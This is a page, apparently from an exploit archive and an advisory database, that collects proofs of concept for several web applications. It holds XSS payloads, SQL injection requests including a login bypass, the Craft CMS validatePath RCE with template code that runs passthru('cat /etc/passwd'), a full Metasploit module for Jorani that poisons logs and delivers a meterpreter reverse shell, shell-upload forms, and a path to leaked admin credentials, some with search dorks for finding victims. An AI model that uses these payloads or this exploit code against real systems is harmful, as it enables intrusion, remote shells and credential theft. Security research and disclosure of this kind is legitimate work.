FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

**FoccusWeb CMS 0.1 Cross Site Scripting**

Posted Aug 22, 2023

Authored by indoushka

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4ec7d01c602a400932502d010a16a7b1bacb2f323fbd9f44c16aef7baacd0231

Download | Favorite | View

**FoccusWeb CMS 0.1 Cross Site Scripting**

    ======================================================================================================================================| # Title     : FoccusWeb CMS v0.1 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : http://www.foccusweb.com/site/                                                                                       |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submitGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,996)
*   Arbitrary (16,211)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,452)
*   Encryption (2,370)
*   Exploit (51,936)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,782)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,795)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,185)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,380)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,786)
*   Web (9,669)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,949)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,494)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,741)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,834)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FoccusWeb CMS 0.1 Cross Site Scripting

Color Prediction Game version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Color Prediction Game v1.0 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /loginNow.php HTTP/1.1Host: localhostCookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------395879129218961020344050490865Content-Length: 434Origin: http://localhostReferer: http://localhost/login.phpSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--### Parameter & Payloads ###Parameter: MULTIPART login_mobile ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: -----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--

Color Prediction Game 1.0 SQL Injection

### Summary
Bypassing the validatePath function can lead to potential Remote Code Execution
(Post-authentication, ALLOW_ADMIN_CHANGES=true)

### Details

In bootstrap.php, the SystemPaths path is set as below.
```php
// Set the vendor path. By default assume that it's 4 levels up from here
$vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(__DIR__, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.
$rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory
$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? "$rootPath/.env";
$configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? "$rootPath/config";
$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? "$rootPath/migrations";
$storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? "$rootPath/storage";
$templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? "$rootPath/templates";
$translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? "$rootPath/translations";
$testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? "$rootPath/tests";
```

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()
```php
    /**
     * @param string $attribute
     * @param array|null $params
     * @param InlineValidator $validator
     * @return void
     * @since 4.4.6
     */
    public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
    {
        // Make sure it’s not within any of the system directories
        $path = FileHelper::absolutePath($this->getRootPath(), '/');

        $systemDirs = Craft::$app->getPath()->getSystemPaths();

        foreach ($systemDirs as $dir) {
            $dir = FileHelper::absolutePath($dir, '/');
            if (str_starts_with("$path/", "$dir/")) {
                $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
                break;
            }
        }
    }
```

ref. https://www.php.net/manual/en/wrappers.file.php



### PoC
1) Create a new filesystem. **Base Path: file:///var/www/html/templates**

![1](https://user-images.githubusercontent.com/30969523/249252853-5cde9bae-9279-428a-972b-d4444c545819.png)


2) Create a new asset volume. Asset Filesystem: local_bypass

![2](https://user-images.githubusercontent.com/30969523/249256711-e37da7f8-52d6-4ecc-bfc4-b9b9d8a2230d.png)


3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates
```twig
{{'<pre>'}}
{{1337*1337}}
{{['cat /etc/passwd']|map('passthru')|join}}
{{['id;pwd;ls -altr /']|map('passthru')|join}}
```
![3](https://user-images.githubusercontent.com/30969523/249256731-8dafc3dc-4937-4f69-bba0-97bc96be1ada.png)
![4](https://user-images.githubusercontent.com/30969523/249257369-54e22aff-3919-4a21-b696-a7be74086ff9.png)


4) Create a new route. URI: * , Template: poc.ttml

![5](https://user-images.githubusercontent.com/30969523/249257437-972ec725-8197-4472-9b57-750ab91d9bfd.png)


5) Confirm RCE on arbitrary path ( /* )

![6](https://user-images.githubusercontent.com/30969523/249257465-061dbaf8-a2c6-4366-80f5-986a15bad748.png)


#### PoC Env

![0628 env](https://user-images.githubusercontent.com/30969523/249252784-6e5913ad-9ad1-4d3a-a70f-2c5ff9f55166.png)


### Impact
Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-40035

**Craft CMS vulnerable to Remote Code Execution via validatePath bypass**

High severity GitHub Reviewed Published Aug 19, 2023 in craftcms/cms • Updated Aug 21, 2023

**Package**

**Affected versions**

\>= 4.0.0-RC1, <= 4.4.14

\>= 3.0.0, <= 3.8.14

**Patched versions**

4.4.15

3.8.15

**Summary**

Bypassing the validatePath function can lead to potential Remote Code Execution  
(Post-authentication, ALLOW\_ADMIN\_CHANGES=true)

**Details**

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it's 4 levels up from here
$vendorPath = $findConfigPath('--vendorPath', 'CRAFT\_VENDOR\_PATH') ?? dirname(\_\_DIR\_\_, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.
$rootPath = $findConfigPath('--basePath', 'CRAFT\_BASE\_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory
$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT\_DOTENV\_PATH') ?? "$rootPath/.env";
$configPath = $findConfigPath('--configPath', 'CRAFT\_CONFIG\_PATH') ?? "$rootPath/config";
$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT\_CONTENT\_MIGRATIONS\_PATH') ?? "$rootPath/migrations";
$storagePath = $findConfigPath('--storagePath', 'CRAFT\_STORAGE\_PATH') ?? "$rootPath/storage";
$templatesPath = $findConfigPath('--templatesPath', 'CRAFT\_TEMPLATES\_PATH') ?? "$rootPath/templates";
$translationsPath = $findConfigPath('--translationsPath', 'CRAFT\_TRANSLATIONS\_PATH') ?? "$rootPath/translations";
$testsPath = $findConfigPath('--testsPath', 'CRAFT\_TESTS\_PATH') ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

    /\*\*
     \* @param string $attribute
     \* @param array|null $params
     \* @param InlineValidator $validator
     \* @return void
     \* @since 4.4.6
     \*/
    public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
    {
        // Make sure it’s not within any of the system directories
        $path = FileHelper::absolutePath($this\->getRootPath(), '/');

        $systemDirs = Craft::$app\->getPath()->getSystemPaths();

        foreach ($systemDirs as $dir) {
            $dir = FileHelper::absolutePath($dir, '/');
            if (str\_starts\_with("$path/", "$dir/")) {
                $validator\->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
                break;
            }
        }
    }

ref. https://www.php.net/manual/en/wrappers.file.php

**PoC**

1.  Create a new filesystem. **Base Path: file:///var/www/html/templates**

2.  Create a new asset volume. Asset Filesystem: local\_bypass

3.  Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates

{{'<pre>'}}
{{1337\*1337}}
{{\['cat /etc/passwd'\]|map('passthru')|join}}
{{\['id;pwd;ls -altr /'\]|map('passthru')|join}}

  

4.  Create a new route. URI: \* , Template: poc.ttml

5.  Confirm RCE on arbitrary path ( /\* )

**PoC Env**

**Impact**

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW\_ADMIN\_CHANGES=true, there is still a potential security threat (Remote Code Execution)

**References**

*   GHSA-44wr-rmwq-3phw
*   craftcms/cms@0bd3386
*   https://github.com/craftcms/cms/releases/tag/3.8.15
*   https://github.com/craftcms/cms/releases/tag/4.4.15

Published to the GitHub Advisory Database

Aug 21, 2023

Last updated

Aug 21, 2023

GHSA-44wr-rmwq-3phw: Craft CMS vulnerable to Remote Code Execution via validatePath bypass

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Jorani versions prior to 1.0.2. It abuses log poisoning and redirection bypass via header spoofing and then it uses path traversal to trigger the vulnerability. It has been tested on Jorani 1.0.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Jorani unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.          It has been tested on Jorani 1.0.0.        },        'License' => MSF_LICENSE,        'Author' => [          'RIOUX Guilhem (jrjgjk)'        ],        'References' => [          ['CVE', '2023-26469'],          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']        ],        'Platform' => %w[php],        'Arch' => ARCH_PHP,        'Targets' => [          ['Jorani < 1.0.2', {}]        ],        'DefaultOptions' => {          'PAYLOAD' => 'php/meterpreter/reverse_tcp',          'RPORT' => 443,          'SSL' => true        },        'DisclosureDate' => '2023-01-06',        'Privileged' => false,        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])      ]    )  end  def get_version(res)    footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text    matches = footer_text.scan(/v([0-9.]+)/i)    if matches.nil? || matches[0].nil?      print_error('Cannot recovered Jorani version...')      return nil    end    matches[0][0]  end  def service_running(res)    matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/)    if matches.nil?      print_error("Jorani doesn't appear to be running on the target")      return false    end    true  end  def recover_csrf(res)    csrf_token = res.get_html_document.xpath('//input[@name="csrf_test_jorani"]/@value').text    return csrf_token if csrf_token.length == 32    nil  end  def check    # For the check command    print_status('Checking Jorani version')    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'uri' => "#{uri}/session/login"    )    if res.nil?      return Exploit::CheckCode::Safe('There was a problem accessing the login page')    end    return Exploit::CheckCode::Safe unless service_running(res)    print_good('Jorani seems to be running on the target!')    current_version = get_version(res)    return Exploit::CheckCode::Detected if current_version.nil?    print_good("Found version: #{current_version}")    current_version = Rex::Version.new(current_version)    return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')    Exploit::CheckCode::Safe  end  def exploit    # Main function    print_status('Trying to exploit LFI')    path_trav_payload = '../../application/logs'    header_name = Rex::Text.rand_text_alpha_upper(16)    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/session/login"    )    if res.nil?      print_error('There was a problem accessing the login page')      return    end    print_status('Recovering CSRF token')    csrf_tok = recover_csrf(res)    if csrf_tok.nil?      print_status('CSRF not found, doesn\'t mean its not vulnerable')    else      print_good("CSRF found: #{csrf_tok}")    end    print_status('Poisoning log with payload..')    print_status('Sending 1st payload')    send_request_cgi(      'method' => 'POST',      'keep_cookies' => true,      'uri' => "#{uri}/session/login",      'data' => "csrf_test_jorani=#{csrf_tok}&"                  \                'last_page=session/login&'                       \                "language=#{path_trav_payload}&"                 \                "login=#{Rex::Text.uri_encode(poison_payload)}&" \                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"    )    print_status("Including poisoned log file #{log_file_name}.php")    vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')    print_good('Triggering payload')    send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/pages/view/#{log_file_name}",      'headers' =>      {        'X-REQUESTED-WITH' => 'XMLHttpRequest',        header_name => Rex::Text.rand_text_alpha(14)      }    )    nil  endend

Jorani Remote Code Execution

Academy LMS version 6.1 suffers from an upload vulnerability that could lead to persistent cross site scripting attacks.

    # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 05/08/2023# Vendor: Creativeitem# Vendor Homepage: https://academylms.net/# Software Link: https://demo.academylms.net/# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server# CWE: CWE-79 - CWE-74 - CWE-707## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings3. Upload any Image into the [avatar]4. Capture the POST Request with [Burp Proxy Intercept]5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /wp-admin/async-upload.php HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS by CraCkEr");  </script></svg>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg[-] Done

Academy LMS 6.1 Cross Site Scripting / File Upload

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Evsanati Radyo 1.0 Shell Upload

Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.

SQL injection bypass login:  
POST /O\_Blog-main/ HTTP/1.1  
Host: 192.168.150.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

CVE-2023-38899: sql sql injection · Issue #2 · berkaygediz/O_Blog

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.

Tag

#php